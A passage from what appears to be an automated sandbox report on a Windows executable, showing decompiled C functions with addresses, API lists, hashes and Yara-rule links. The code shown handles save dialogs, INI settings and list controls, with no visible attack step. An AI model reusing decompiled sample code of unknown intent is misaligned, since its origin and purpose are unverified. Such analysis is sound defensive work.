						_t95 = _t95 + 0x10;
						__eflags = _t60;
						if(_t60 >= 0) {
							L17:
							_v12 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(_t76 + 0x2e4))));
							goto L18;
						}
						__eflags = _t62;
						if(_t62 < 0) {
							goto L18;
						}
						goto L17;
						L18:
						_v8 = _v8 + 1;
						_t92 = _t92 + 0x14;
						__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
					} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
					goto L19;
				}
				_t94 = 0;
				__eflags = 0;
				do {
					_push(_a4);
					_t66 =  *((intOrPtr*)(_t76 + 0x2e4));
					_push( *((intOrPtr*)(_t94 + _t66 + 0x10)));
					L0040E03E();
					_push(_a4);
					_t67 =  *((intOrPtr*)(_t76 + 0x48));
					_push( *((intOrPtr*)(_t67 + _t94 + 0x10)));
					L0040E03E();
					_t95 = _t95 + 0x10;
					__eflags = _t66;
					if(_t66 == 0) {
						L11:
						_v12 =  *(_t94 +  *((intOrPtr*)(_t76 + 0x2e4)));
						_v16 = 1;
						goto L12;
					}
					__eflags = _t67;
					if(_t67 != 0) {
						goto L12;
					}
					goto L11;
					L12:
					_v8 = _v8 + 1;
					_t94 = _t94 + 0x14;
					__eflags = _v8 -  *((intOrPtr*)(_t76 + 0x2e0));
				} while (_v8 <  *((intOrPtr*)(_t76 + 0x2e0)));
				__eflags = _v16;
				if(_v16 != 0) {
					goto L19;
				}
				goto L14;
			}




















                                                                                                                                                0x0040a08d
                                                                                                                                                0x0040a08f
                                                                                                                                                0x0040a096
                                                                                                                                                0x0040a099
                                                                                                                                                0x0040a09b
                                                                                                                                                0x0040a09b
                                                                                                                                                0x0040a0a9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a0ab
                                                                                                                                                0x0040a0af
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a0b2
                                                                                                                                                0x0040a0bb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a0bd
                                                                                                                                                0x0040a0be
                                                                                                                                                0x0040a0c6
                                                                                                                                                0x0040a0e7
                                                                                                                                                0x0040a0e7
                                                                                                                                                0x0040a1af
                                                                                                                                                0x0040a1b6
                                                                                                                                                0x0040a1b8
                                                                                                                                                0x0040a1b8
                                                                                                                                                0x0040a1bf
                                                                                                                                                0x0040a1c5
                                                                                                                                                0x0040a1c8
                                                                                                                                                0x0040a1ce
                                                                                                                                                0x0040a1d6
                                                                                                                                                0x0040a1d6
                                                                                                                                                0x0040a0ef
                                                                                                                                                0x0040a0f5
                                                                                                                                                0x0040a0f8
                                                                                                                                                0x0040a0fb
                                                                                                                                                0x0040a157
                                                                                                                                                0x0040a157
                                                                                                                                                0x0040a159
                                                                                                                                                0x0040a15f
                                                                                                                                                0x0040a162
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a164
                                                                                                                                                0x0040a164
                                                                                                                                                0x0040a171
                                                                                                                                                0x0040a182
                                                                                                                                                0x0040a187
                                                                                                                                                0x0040a18a
                                                                                                                                                0x0040a18c
                                                                                                                                                0x0040a192
                                                                                                                                                0x0040a19b
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a19b
                                                                                                                                                0x0040a18e
                                                                                                                                                0x0040a190
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a19e
                                                                                                                                                0x0040a19e
                                                                                                                                                0x0040a1a4
                                                                                                                                                0x0040a1a7
                                                                                                                                                0x0040a1a7
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a164
                                                                                                                                                0x0040a0fd
                                                                                                                                                0x0040a0fd
                                                                                                                                                0x0040a0ff
                                                                                                                                                0x0040a0ff
                                                                                                                                                0x0040a102
                                                                                                                                                0x0040a108
                                                                                                                                                0x0040a10c
                                                                                                                                                0x0040a111
                                                                                                                                                0x0040a116
                                                                                                                                                0x0040a119
                                                                                                                                                0x0040a11d
                                                                                                                                                0x0040a122
                                                                                                                                                0x0040a125
                                                                                                                                                0x0040a127
                                                                                                                                                0x0040a12d
                                                                                                                                                0x0040a136
                                                                                                                                                0x0040a139
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a139
                                                                                                                                                0x0040a129
                                                                                                                                                0x0040a12b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a140
                                                                                                                                                0x0040a140
                                                                                                                                                0x0040a146
                                                                                                                                                0x0040a149
                                                                                                                                                0x0040a149
                                                                                                                                                0x0040a151
                                                                                                                                                0x0040a155
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00407A66: ??2@YAPAXI@Z.MSVCRT ref: 00407A87
                                                                                                                                                  • Part of subcall function 00407A66: ??3@YAXPAX@Z.MSVCRT ref: 00407B4E
                                                                                                                                                • wcslen.MSVCRT ref: 0040A0B2
                                                                                                                                                • _wtoi.MSVCRT ref: 0040A0BE
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040A10C
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040A11D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1549203181-0
                                                                                                                                                • Opcode ID: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                • Instruction ID: 173153ae92e8ec93863a9f5982dcfa1c11e383f1bf25a9e136d2eac58130d476
                                                                                                                                                • Opcode Fuzzy Hash: 7dd6d63d10815eadb1078566161622f675861b17a3bacd31860cb4180f0995c0
                                                                                                                                                • Instruction Fuzzy Hash: D2415C31900304AFCB21DF69C580A9EBBB4EF44355F1444BAEC05EB396D678DAA18B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040AB6E, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040AB6E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				char* _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char* _v76;
				char _v80;
				void _v2126;
				signed short _v2128;
				void* __ebx;
				void* __edi;
				char _t32;
				intOrPtr _t33;
				char _t34;
				intOrPtr _t38;
				signed short _t57;
				char* _t62;
				char* _t64;

				_v2128 = _v2128 & 0x00000000;
				memset( &_v2126, 0, 0x7fe);
				_t32 =  *((intOrPtr*)(L"txt")); // 0x780074
				_v16 = _t32;
				_t33 =  *0x410294; // 0x74
				_v12 = _t33;
				_t34 = E00406827(0x1f5);
				_t64 = L"*.txt";
				_v80 = _t34;
				_v76 = _t64;
				_v72 = E00406827(0x1f6);
				_v68 = _t64;
				_v64 = E00406827(0x1f7);
				_v60 = L"*.json";
				_v56 = E00406827(0x1fb);
				_v52 = L"*.csv";
				_t38 = E00406827(0x1f8);
				_t62 = L"*.htm;*.html";
				_v48 = _t38;
				_v44 = _t62;
				_v40 = E00406827(0x1f9);
				_v36 = _t62;
				_v32 = E00406827(0x1fa);
				_v28 = L"*.xml";
				_v24 = E00406827(0x1fc);
				_v20 = _t64;
				E00406050( &_v2128,  &_v80);
				_t57 = 7;
				return E00405DCD(_a12,  *((intOrPtr*)(_a4 + 0x208)), _a8,  &_v2128, E00406827(_t57),  &_v16);
			}
































                                                                                                                                                0x0040ab77
                                                                                                                                                0x0040ab90
                                                                                                                                                0x0040ab95
                                                                                                                                                0x0040ab9a
                                                                                                                                                0x0040ab9d
                                                                                                                                                0x0040abaa
                                                                                                                                                0x0040abad
                                                                                                                                                0x0040abb2
                                                                                                                                                0x0040abb8
                                                                                                                                                0x0040abbb
                                                                                                                                                0x0040abc8
                                                                                                                                                0x0040abcb
                                                                                                                                                0x0040abd6
                                                                                                                                                0x0040abd9
                                                                                                                                                0x0040abea
                                                                                                                                                0x0040abed
                                                                                                                                                0x0040abf4
                                                                                                                                                0x0040abf9
                                                                                                                                                0x0040abff
                                                                                                                                                0x0040ac02
                                                                                                                                                0x0040ac0f
                                                                                                                                                0x0040ac12
                                                                                                                                                0x0040ac1d
                                                                                                                                                0x0040ac20
                                                                                                                                                0x0040ac2c
                                                                                                                                                0x0040ac39
                                                                                                                                                0x0040ac3c
                                                                                                                                                0x0040ac44
                                                                                                                                                0x0040ac71

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040AB90
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                  • Part of subcall function 00406050: memset.MSVCRT ref: 00406071
                                                                                                                                                  • Part of subcall function 00406050: _snwprintf.MSVCRT ref: 0040609F
                                                                                                                                                  • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060AB
                                                                                                                                                  • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060C3
                                                                                                                                                  • Part of subcall function 00406050: wcslen.MSVCRT ref: 004060D1
                                                                                                                                                  • Part of subcall function 00406050: memcpy.MSVCRT ref: 004060E4
                                                                                                                                                  • Part of subcall function 00405DCD: GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
                                                                                                                                                  • Part of subcall function 00405DCD: wcscpy.MSVCRT ref: 00405E33
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                                                • String ID: *.htm;*.html$*.txt$txt
                                                                                                                                                • API String ID: 1392923015-1706329710
                                                                                                                                                • Opcode ID: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                • Instruction ID: 6a1f0fe5a8f9a0d06c10808573add6bd6f8ed95605c5985f6cf117c7f3196cfa
                                                                                                                                                • Opcode Fuzzy Hash: 9ddafcd3e3873cef2600ad60d320d0a67768a4cae7d1907286cd4c839e47c819
                                                                                                                                                • Instruction Fuzzy Hash: 5C215EB2D0121A9FCB40EF96D885ADDBBB4FF04308F10807BE409B7281DB7859418F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00406613, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E00406613(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040E038();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040E032();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                0x00406613
                                                                                                                                                0x00406614
                                                                                                                                                0x00406614
                                                                                                                                                0x00406617
                                                                                                                                                0x0040661b
                                                                                                                                                0x0040662e
                                                                                                                                                0x0040662e
                                                                                                                                                0x00406632
                                                                                                                                                0x00406634
                                                                                                                                                0x0040663a
                                                                                                                                                0x0040663b
                                                                                                                                                0x0040663e
                                                                                                                                                0x00406647
                                                                                                                                                0x00406648
                                                                                                                                                0x0040664d
                                                                                                                                                0x00406657
                                                                                                                                                0x00406659
                                                                                                                                                0x0040665e
                                                                                                                                                0x00406665
                                                                                                                                                0x0040666f
                                                                                                                                                0x00406671
                                                                                                                                                0x00406672
                                                                                                                                                0x00406677
                                                                                                                                                0x0040667e
                                                                                                                                                0x00406687
                                                                                                                                                0x0040661d
                                                                                                                                                0x0040661d
                                                                                                                                                0x0040661f
                                                                                                                                                0x00406621
                                                                                                                                                0x00406626
                                                                                                                                                0x00406627
                                                                                                                                                0x0040662a
                                                                                                                                                0x0040662c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040662c
                                                                                                                                                0x00406697
                                                                                                                                                0x0040669a
                                                                                                                                                0x004066a3
                                                                                                                                                0x004066a3
                                                                                                                                                0x0040668c
                                                                                                                                                0x00406690

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                • Opcode ID: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                • Instruction ID: 0097541d92ab95bcfef6608398cdc2c51d263adba4e227b481c9d82b5fae792d
                                                                                                                                                • Opcode Fuzzy Hash: 8e0fc6793aebc9f9da890fe29524187452bc62cfb9288e210baf46e5438cf18a
                                                                                                                                                • Instruction Fuzzy Hash: EB114C716046019FD328DF2DC881A26F7E9EFD8300B218D3EE59A97395DA76E811CB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040D5E8, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 35%
                                                                                                                                                			E0040D5E8(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040E340(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40f454,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E00405F0A( &_v16392, _t34, _a16);
				} else {
					memset();
					E00405E81(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                                                0x0040d5e8
                                                                                                                                                0x0040d5f0
                                                                                                                                                0x0040d5fc
                                                                                                                                                0x0040d601
                                                                                                                                                0x0040d602
                                                                                                                                                0x0040d60f
                                                                                                                                                0x0040d611
                                                                                                                                                0x0040d612
                                                                                                                                                0x0040d647
                                                                                                                                                0x0040d669
                                                                                                                                                0x0040d676
                                                                                                                                                0x0040d67f
                                                                                                                                                0x0040d681
                                                                                                                                                0x0040d614
                                                                                                                                                0x0040d614
                                                                                                                                                0x0040d625
                                                                                                                                                0x0040d643
                                                                                                                                                0x0040d643
                                                                                                                                                0x0040d68d

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D614
                                                                                                                                                  • Part of subcall function 00405E81: _snwprintf.MSVCRT ref: 00405EC6
                                                                                                                                                  • Part of subcall function 00405E81: memcpy.MSVCRT ref: 00405ED6
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0040D63D
                                                                                                                                                • memset.MSVCRT ref: 0040D647
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 0040D669
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
                                                                                                                                                • Opcode ID: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                • Instruction ID: e5ada5cee961c9ffd84a11649d97ac6ffa4cf685c3efd691eec2e39df5646265
                                                                                                                                                • Opcode Fuzzy Hash: 1ef896f5ac476238214e2e7a1c8d83b09bc725c3f104deaf738d1964be3b1b7d
                                                                                                                                                • Instruction Fuzzy Hash: D5118272500119AFDF11AF65DC02E9E7B79EF04704F100476FF09B20A1E6359A649F9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00402B94, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00402B94(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				signed int _v32;
				void _v48;
				void* _v52;
				int _v68;
				intOrPtr _v72;
				signed int _v80;
				int _v92;
				void _v96;
				void* _v100;
				signed int _t34;

				memset( &_v96, 0, 0x2c);
				_v100 = _a12;
				_v80 = _a16;
				_v72 = _a20;
				_v96 = 0;
				_v92 = 0;
				_v68 = 0;
				memset( &_v48, 0, 0x2c);
				_v52 = 4;
				if(SendMessageW(_a4, 0x120b, _a8,  &_v52) != 0) {
					_t34 = _v32 & 0x00000003;
					if(_t34 != 0) {
						_v80 = _v80 & 0xfffffffc | _t34;
					}
				}
				return SendMessageW(_a4, 0x120c, _a8,  &_v100);
			}













                                                                                                                                                0x00402ba8
                                                                                                                                                0x00402bb0
                                                                                                                                                0x00402bb7
                                                                                                                                                0x00402bc0
                                                                                                                                                0x00402bca
                                                                                                                                                0x00402bce
                                                                                                                                                0x00402bd2
                                                                                                                                                0x00402bd6
                                                                                                                                                0x00402bec
                                                                                                                                                0x00402c00
                                                                                                                                                0x00402c06
                                                                                                                                                0x00402c09
                                                                                                                                                0x00402c14
                                                                                                                                                0x00402c14
                                                                                                                                                0x00402c09
                                                                                                                                                0x00402c2e

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 568519121-0
                                                                                                                                                • Opcode ID: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                • Instruction ID: b9af20001e59f3bd0701389c088e4a3ca17ea943e2d6bc3205c17ab3910d7cc1
                                                                                                                                                • Opcode Fuzzy Hash: 3dbf91b2b69beef7f82be7727ae9dd33bc881aaf68ef105acbafed814d97d997
                                                                                                                                                • Instruction Fuzzy Hash: 61115B72508314ABD711DF14CC0199FBFE8EB89750F004A2AFA64E7290D371DA20CB96
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040A3BF, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                			E0040A3BF(void* __esi) {
				void* _v516;
				long _v1028;
				void* __ebx;
				wchar_t* _t15;
				signed short _t23;
				signed short _t25;
				void* _t29;

				_t29 = __esi;
				_push(E0040778A( *((intOrPtr*)(__esi + 0x69c))));
				_t23 = 4;
				_push(E00406827(_t23));
				_push(0xff);
				_push( &_v516);
				L0040DFD6();
				_t15 = E00407E16( *((intOrPtr*)(__esi + 0x69c)), 0);
				if(_t15 > 0) {
					_push(_t15);
					_t25 = 5;
					_push(E00406827(_t25));
					_push(0xff);
					_push( &_v1028);
					L0040DFD6();
					_t15 = wcscat( &_v516,  &_v1028);
				}
				if( *((intOrPtr*)(_t29 + 0x208)) != 0) {
					return SendMessageW( *(_t29 + 0x214), 0x40b, 0,  &_v516);
				}
				return _t15;
			}










                                                                                                                                                0x0040a3bf
                                                                                                                                                0x0040a3d5
                                                                                                                                                0x0040a3d8
                                                                                                                                                0x0040a3de
                                                                                                                                                0x0040a3ea
                                                                                                                                                0x0040a3eb
                                                                                                                                                0x0040a3ec
                                                                                                                                                0x0040a3fc
                                                                                                                                                0x0040a403
                                                                                                                                                0x0040a405
                                                                                                                                                0x0040a408
                                                                                                                                                0x0040a40e
                                                                                                                                                0x0040a415
                                                                                                                                                0x0040a416
                                                                                                                                                0x0040a417
                                                                                                                                                0x0040a42a
                                                                                                                                                0x0040a42f
                                                                                                                                                0x0040a43b
                                                                                                                                                0x00000000
                                                                                                                                                0x0040a451
                                                                                                                                                0x0040a458

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A3EC
                                                                                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040A451
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A417
                                                                                                                                                • wcscat.MSVCRT ref: 0040A42A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 822687973-0
                                                                                                                                                • Opcode ID: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                • Instruction ID: d08295fd2af1cf787610e7cf5331bd4bc3d6faa59d3d329b1d8aec9a5db4e45c
                                                                                                                                                • Opcode Fuzzy Hash: fa48f0b94a06f49b58a326b4bcc618fa866d7abdeda14d17ebe30566094cc372
                                                                                                                                                • Instruction Fuzzy Hash: 5C01D8B29003096AE720F275CC8AFA773ACAB40318F00447EB71AF10C2D679A9154A6D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040576B, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040576B(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                0x00405789
                                                                                                                                                0x00405791
                                                                                                                                                0x00405795
                                                                                                                                                0x00405798
                                                                                                                                                0x0040579b
                                                                                                                                                0x004057b9
                                                                                                                                                0x004057b9
                                                                                                                                                0x0040579d
                                                                                                                                                0x0040579d
                                                                                                                                                0x004057ae
                                                                                                                                                0x004057b7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x004057b7
                                                                                                                                                0x004057ca
                                                                                                                                                0x004057ce
                                                                                                                                                0x004057ce
                                                                                                                                                0x004057bb
                                                                                                                                                0x004057bf

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32 ref: 00405779
                                                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00405791
                                                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 004057A7
                                                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 004057CA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Item
                                                                                                                                                • String ID:
